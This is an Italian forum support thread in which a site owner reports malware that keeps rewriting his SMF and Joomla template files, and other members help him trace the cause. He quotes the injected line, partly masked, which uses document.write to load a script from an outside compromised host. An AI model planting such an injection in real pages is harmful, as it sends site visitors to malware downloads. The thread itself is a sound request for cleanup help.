Problema con malware

[robin]

Salve,
come ho scritto nella sezione presentazione ho un bel problema, scusate se appena arrivato mi permetto di chiedere aiuto, ma mi trovo veramente incasinato!!!
Ho un malware che continua ad apparire e non riesco a debellarlo.

I file contenuti nella cartella template/default/scripts vengono riscritti con un pezzo di codice che rimanda in vari siti dove si chiede di scaricare un applicativo contenente virus.
il codice viene anche aggiunto al file "index.template.php" che si trovano nella cartella template/core e template/default.

Riporto il codice mascherando alcune parti di esso con dei # perchè non so che effetto potrebbe avere sul vostro forum del codice contenuto in un messaggio e non vorrei causare guai:

/*339810*/
docu#.wri#('<scri# type="text/javascript">var gwloaded = false;</script><scri# src="http://sgaccounting.net/wp-includes/YXdeEXY6.php" type="text/javascript"></script>')
/*/339810*/

Se pur più volte ho risistemati gli script esso si continua a replicare e non riesco a debellarlo!!

Consigli?

Grazie

Roberto

[Darknico]

Direi che abbiamo bisogno di qualche info in più...
Link al sito?
Altri CMS installati sul tuo spazio?
Da quando hai questo problema? Da quale versione SMF?
Il tuo hosting? Linux/windows?

[robin]

Grazie della risposta!!

- il link del forum è www.lupiairgunsroma.org/forum

- il sito sempre allo stesso link (www.lupiairgunsroma.org/portale) è fatto con joomla

- il problema si presenta da circa il 23 di questo mese, ma forse era già presente e non me ne sono accorto (parlo della modifica di index.template.php)

- la versione da cui me ne sono accorto era la 2.0.4, appena scoperto il problema ho aggiornato alla 2.0.5, qualche giorno fa in seguito all'uscita della 2.0.6 ho provveduto all'ulteriore upgrade.

Roberto

[emanuele]

Joomla è aggiornato?
Mi pare di ricordare che l'anno scorso (o simile) Joomla ha avuto una vulnerabilità che portava esattamente a questo hack.

[robin]

si, la 3.1.5

[robin]

Qualcosa ho trovato.. ma non molto:
http://ninjamonitoring.com/malware/index.php?threat=2013-10-23.01

poi facendo con lo scan con questo sito non trova nessun malware .. ma io so che c'è!!
http://sitecheck.sucuri.net/scanner/

se andate sulla pagina del forum, con gli strumenti per sviluppatori sotto resource/frame nell'elenco degli script trovate: ...../wp-includes/YXdeEXY6.php

oggi nel pomeriggio ripulisco...

Roberto

[Darknico]

Ma scusa, hai anche wordpress?

[robin]

no, ho joomla, ma il problema è lo stesso, solo che nel caso riportato d me l'inserimento è avvenuto in html che richiama uno scritp, nel mio caso è proprio la modifica dello script java...

[robin]

Continuo a combatterci...
Ho scoperto che anche joomla era stato infetto, questa volta nei file index.php di tutti i template presenti.
A questo punto penso che il buco non sia smf, ma ci deve essere stato un modo per ottenere l'accesso al pannello di controllo....
Ho cambiato la password, vediamo se si ripete!!

Sperando che non sia stata montata una backdoor..

Roberto